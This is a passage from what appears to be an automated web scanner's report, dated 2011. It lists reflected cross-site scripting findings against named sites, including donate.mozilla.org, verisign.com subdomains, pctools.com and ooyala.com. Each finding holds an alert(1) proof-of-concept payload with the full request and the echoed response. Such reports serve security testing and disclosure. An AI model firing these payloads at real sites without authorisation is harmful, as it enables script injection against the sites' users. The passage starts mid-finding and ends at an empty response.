The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 91fb8<script>alert(1)</script>7f56fd6704d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute91fb8<script>alert(1)</script>7f56fd6704d /openwebfund HTTP/1.1 Host: donate.mozilla.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751
Response
HTTP/1.0 404 Not Found Server: Apache Content-Type: text/html; charset=ISO-8859-1 Date: Fri, 09 Sep 2011 22:14:59 GMT Connection: Keep-Alive Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/ Content-Length: 391 <html> <head> <title>Error 404</title> </head> <body> <h1>Sorry, File Not Found: 404</h1> <p>Invalid URL /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute91fb8<script>alert(1)</script>7f56fd6704d /openwebfund</p>...[SNIP]...
3.9. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 4]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://donate.mozilla.org
Path:
/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 63933<script>alert(1)</script>bf1b7d05258 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund63933<script>alert(1)</script>bf1b7d05258 HTTP/1.1 Host: donate.mozilla.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751
Response
HTTP/1.0 404 Not Found Server: Apache Content-Type: text/html; charset=ISO-8859-1 Date: Fri, 09 Sep 2011 22:15:01 GMT Connection: Keep-Alive Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/ Content-Length: 391 <html> <head> <title>Error 404</title> </head> <body> <h1>Sorry, File Not Found: 404</h1> <p>Invalid URL /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund63933<script>alert(1)</script>bf1b7d05258 </p>...[SNIP]...
3.10. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://donate.mozilla.org
Path:
/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 48171<script>alert(1)</script>2ff872bc181 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund?48171<script>alert(1)</script>2ff872bc181 =1 HTTP/1.1 Host: donate.mozilla.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751
Response
HTTP/1.0 404 Not Found Server: Apache Content-Type: text/html; charset=ISO-8859-1 Date: Fri, 09 Sep 2011 22:14:56 GMT Connection: Keep-Alive Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/ Content-Length: 394 <html> <head> <title>Error 404</title> </head> <body> <h1>Sorry, File Not Found: 404</h1> <p>Invalid URL /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund?48171<script>alert(1)</script>2ff872bc181 =1</p>...[SNIP]...
3.11. https://fileconnect.symantec.com/licenselogin.jsp [localeStr parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
https://fileconnect.symantec.com
Path:
/licenselogin.jsp
Issue detail
The value of the localeStr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba9ab"%3b528b7643cdb was submitted in the localeStr parameter. This input was echoed as ba9ab";528b7643cdb in the application's response. This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /licenselogin.jsp?localeStr=en_USba9ab"%3b528b7643cdb HTTP/1.1 Host: fileconnect.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Fri, 09 Sep 2011 21:41:59 GMT Content-length: 9332 Content-type: text/html;charset=UTF-8 Pragma: no-cache Content-Language: en-US Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-store Connection: close <html> <head> <script language="JavaScript" src="javascript/common.js"></script> <script language="JavaScript" src="javascript/calendar2.js"></script> <...[SNIP]... and channel on the next lines. */ s.pageName = "en/us: biz: FileConnect: Serial Number Input https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_US"; // set page name s.prop2 = "USba9ab";528b7643cdb " // set country s.eVar27 = "USba9ab";528b7643cdb" s.prop3 = "en" // set language s.eVar28 = "en" s.prop27 = "Business"; // set Visitor Segment s.eVar50 = "Business"; s.prop41 = "FileConne...[SNIP]...
3.12. https://forms.verisign.com/websurveys/servlet/ActionMultiplexer [Action_ID parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://forms.verisign.com
Path:
/websurveys/servlet/ActionMultiplexer
Issue detail
The value of the Action_ID request parameter is copied into the HTML document as plain text between tags. The payload 63579<script>alert(1)</script>6e92133b729 was submitted in the Action_ID parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /websurveys/servlet/ActionMultiplexer?Action_ID=ACT200063579<script>alert(1)</script>6e92133b729 &WSD_mode=3&WSD_surveyInfoID=943&toc=AAAAA-943-01-26&brand=01&country=26&oldToc=w29810323919638016&cid=47D9F8084F78B063 HTTP/1.1 Host: forms.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 80 Date: Fri, 09 Sep 2011 21:41:22 GMT Missing or unknown action ID: ACT200063579<script>alert(1)</script>6e92133b729
3.13. http://free.pctools.com/favicon.ico [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://free.pctools.com
Path:
/favicon.ico
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e810"><script>alert(1)</script>d4356c76675 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /favicon.ico5e810"><script>alert(1)</script>d4356c76675 HTTP/1.1 Host: free.pctools.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: reftrack=freesite%2320110909170147; PHPSESSID=68o0726o7nflfg28ire9iju5j2; __utma=9079138.240734855.1315623957.1315623957.1315623957.1; __utmb=9079138.1.10.1315623957; __utmc=9079138; __utmz=9079138.1315623957.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=1.1056361608.1315623957.1315623957.1315623957.1; __utmb=1.0.10.1315623957; __utmc=1; __utmz=1.1315623957.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName
Response (redirected)
HTTP/1.1 404 Not Found Server: Apache X-Powered-By: PHP/5.3.4 Content-Type: text/html; charset=UTF-8 Expires: Fri, 09 Sep 2011 22:05:59 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Sep 2011 22:05:59 GMT Content-Length: 8247 Connection: close Vary: Accept-Encoding Set-Cookie: reftrack=freesite%2320110909170147%7Cdeleted%2320110909170223; expires=Sat, 08-Sep-2012 21:02:24 GMT; path=/; domain=.pctools.com <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Get PC Tools AntiVi...[SNIP]... <form method="POST" style="margin: 0; padding: 10px 16px 0 0;" action="/favicon.ico5e810"><script>alert(1)</script>d4356c76675 /">...[SNIP]...
3.14. http://free.pctools.com/free-antivirus/ [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://free.pctools.com
Path:
/free-antivirus/
Issue detail
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36661"><script>alert(1)</script>55a70ea0c85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /free-antivirus36661"><script>alert(1)</script>55a70ea0c85 / HTTP/1.1 Host: free.pctools.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache X-Powered-By: PHP/5.3.4 Content-Type: text/html; charset=UTF-8 Expires: Fri, 09 Sep 2011 21:42:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Sep 2011 21:42:03 GMT Content-Length: 8274 Connection: close Set-Cookie: reftrack=freesite%2320110909163826; expires=Sat, 08-Sep-2012 20:38:28 GMT; path=/; domain=.pctools.com <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Get PC Tools AntiVi...[SNIP]... <form method="POST" style="margin: 0; padding: 10px 16px 0 0;" action="/free-antivirus36661"><script>alert(1)</script>55a70ea0c85 /">...[SNIP]...
3.15. http://free.pctools.com/free-antivirus/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://free.pctools.com
Path:
/free-antivirus/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fde3"><script>alert(1)</script>f1a4218a279 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /free-antivirus/?7fde3"><script>alert(1)</script>f1a4218a279 =1 HTTP/1.1 Host: free.pctools.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.3.4 Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Fri, 09 Sep 2011 21:42:02 GMT Date: Fri, 09 Sep 2011 21:42:02 GMT Content-Length: 17979 Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Free AntiVirus & An...[SNIP]... <form method="POST" style="margin: 0; padding: 10px 16px 0 0;" action="/free-antivirus/?7fde3"><script>alert(1)</script>f1a4218a279 =1">...[SNIP]...
3.16. https://idprotect.verisign.com/toolbar/activate.v [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/toolbar/activate.v
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32d94'-alert(1)-'503da824579 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /toolbar/activate.v?32d94'-alert(1)-'503da824579 =1 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: idprotect.verisign.com Connection: Keep-Alive
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:47:52 GMT Content-Type: text/html;charset=utf-8 Content-Length: 7303 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <script type="text/javascript"> $(document).ready(function(){ $('#kaptchaRefresh').click(function(event) { $('#kaptchaImage').hide().attr('src', '/kaptcha.jpg?32d94'-alert(1)-'503da824579 =1?' + Math.floor(Math.random()*100)).fadeIn(); }); $('#kaptchaImage').click(function (event) { $(this).hide().attr('src', '/kaptcha.jpg?32d94'-alert(1)-'503da824579=1?' + Math.floor(Math.random()...[SNIP]...
3.17. https://idprotect.verisign.com/toolbar/activate.v [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/toolbar/activate.v
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3603"><script>alert(1)</script>2c6cb160cb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /toolbar/activate.v?b3603"><script>alert(1)</script>2c6cb160cb7 =1 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: idprotect.verisign.com Connection: Keep-Alive
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:47:50 GMT Content-Type: text/html;charset=utf-8 Content-Length: 7348 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <img id="kaptchaImage" src="/kaptcha.jpg?b3603"><script>alert(1)</script>2c6cb160cb7 =1" alt="Click for a different one!" title="Click for a different one!" />...[SNIP]...
3.18. https://idprotect.verisign.com/toolbar/download.v [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/toolbar/download.v
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa418"><script>alert(1)</script>feea2f12a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /toolbar/download.v?fa418"><script>alert(1)</script>feea2f12a5 =1 HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/toolbar/home.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:47:52 GMT Content-Type: text/html Content-Length: 6622 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... iv tabindex="0" style="cursor:pointer;padding-top:10px;" onkeydown="if ((event.which && event.which == 13) || (event.keyCode && event.keyCode == 13)) {location.href='/toolbar/install.v?fa418"><script>alert(1)</script>feea2f12a5 =1'}" onclick="location.href='/toolbar/install.v?fa418">...[SNIP]...
3.19. https://idprotect.verisign.com/toolbar/home.v [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/toolbar/home.v
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 141ab"><script>alert(1)</script>41143d22db1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /toolbar/home.v?141ab"><script>alert(1)</script>41143d22db1 =1 HTTP/1.1 Host: idprotect.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:08 GMT Content-Type: text/html Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <div tabindex="0" style="cursor:pointer;" onclick="location.href='/toolbar/download.v?141ab"><script>alert(1)</script>41143d22db1 =1'" onkeydown="if ((event.which && event.which == 13) || (event.keyCode && event.keyCode == 13)) {location.href='/toolbar/download.v?141ab">...[SNIP]...
3.20. https://idprotect.verisign.com/toolbar/install.v [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://idprotect.verisign.com
Path:
/toolbar/install.v
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e6ab"><script>alert(1)</script>b6843a60d67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /toolbar/install.v?2e6ab"><script>alert(1)</script>b6843a60d67 =1 HTTP/1.1 Host: idprotect.verisign.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://idprotect.verisign.com/toolbar/download.v Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:47:52 GMT Content-Type: text/html Content-Length: 6866 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head>...[SNIP]... <a id="download" href="/toolbar/downloadIE.v?2e6ab"><script>alert(1)</script>b6843a60d67 =1">...[SNIP]...
3.21. http://mbox3.offermatica.com/m2/verisign/mbox/standard [mbox parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://mbox3.offermatica.com
Path:
/m2/verisign/mbox/standard
Issue detail
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 9179f<script>alert(1)</script>b30639e2275 was submitted in the mbox parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_20119179f<script>alert(1)</script>b30639e2275 &mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31 HTTP/1.1 Host: mbox3.offermatica.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mboxPC=1315621455064-973488.19
Response
HTTP/1.1 200 OK P3P: CP="NOI DSP CURa OUR STP COM" Set-Cookie: mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:26:45 GMT; Path=/m2/verisign Content-Type: text/javascript Content-Length: 195 Date: Fri, 09 Sep 2011 21:26:45 GMT Server: Test & Target mboxFactoryDefault.get('VRSN_HP_AccBox_20119179f<script>alert(1)</script>b30639e2275 ',0).setOffer(new mboxOfferDefault()).loaded();mboxFactoryDefault.getPCId().forceId("1315621455064-973488.19");
3.22. http://player.ooyala.com/player.js [playerId parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://player.ooyala.com
Path:
/player.js
Issue detail
The value of the playerId request parameter is copied into a JavaScript rest-of-line comment. The payload dbef4%0aalert(1)//8baddfff4b was submitted in the playerId parameter. This input was echoed as dbef4 alert(1)//8baddfff4b in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /player.js?callback=receiveOoyalaEvent&playerId=ooyalaPlayer_44h86_g6tvkk69dbef4%0aalert(1)//8baddfff4b &width=488&height=335&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&wmode=transparent HTTP/1.1 Host: player.ooyala.com Proxy-Connection: keep-alive Referer: http://www.verisign.ch/corporate/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819
Response
HTTP/1.1 200 OK Last-Modified: Fri, 09 Sep 2011 21:26:29 GMT Content-Type: text/javascript; charset=utf-8 X-Ooyala-Server-Id: i-17d1a37b X-Pad: avoid browser bug Content-Length: 26426 Cache-Control: private, max-age=300 Date: Fri, 09 Sep 2011 21:26:30 GMT Connection: close Vary: Accept-Encoding (function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f...[SNIP]... "class":"OoyalaVideoPlayer",data:T};},getEmbedParams:function(T,i){return{allowScriptAccess:"always",allowFullScreen:"true",bgcolor:"#000000",wmode:T,flashvars:i};}};A.init("ooyalaPlayer_44h86_g6tvkk69dbef4 alert(1)//8baddfff4b ",a,d,"transparent","http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf","http",o,F,m,j,B);}else{var N=e.createContainerDiv(q+"_InstallFlash",a,d,B);N.innerHTML='<...[SNIP]...
3.23. http://player.ooyala.com/player.js [wmode parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://player.ooyala.com
Path:
/player.js
Issue detail
The value of the wmode request parameter is copied into a JavaScript rest-of-line comment. The payload 61651%0aalert(1)//96a754f882a was submitted in the wmode parameter. This input was echoed as 61651 alert(1)//96a754f882a in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent61651%0aalert(1)//96a754f882a HTTP/1.1 Host: player.ooyala.com Proxy-Connection: keep-alive Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819
Response
HTTP/1.1 200 OK Last-Modified: Fri, 09 Sep 2011 21:26:35 GMT Content-Type: text/javascript; charset=utf-8 X-Ooyala-Server-Id: i-fa51be9b X-Pad: avoid browser bug Content-Length: 26322 Cache-Control: private, max-age=300 Date: Fri, 09 Sep 2011 21:26:35 GMT Connection: close Vary: Accept-Encoding (function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f...[SNIP]... Player",data:T};},getEmbedParams:function(T,i){return{allowScriptAccess:"always",allowFullScreen:"true",bgcolor:"#000000",wmode:T,flashvars:i};}};A.init("ooyalaPlayer235820917_10kbk3k",a,d,"transparent61651 alert(1)//96a754f882a ","http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf","http",o,F,m,j,B);}else{var N=e.createContainerDiv(q+"_InstallFlash",a,d,B);N.innerHTML='<table width="'+a+'...[SNIP]...
3.24. https://press.verisign.com/easyir/customrel.do [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://press.verisign.com
Path:
/easyir/customrel.do
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 11807--><script>alert(1)</script>5053ee4c92a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /easyir/customrel.do?11807--><script>alert(1)</script>5053ee4c92a =1 HTTP/1.1 Host: press.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
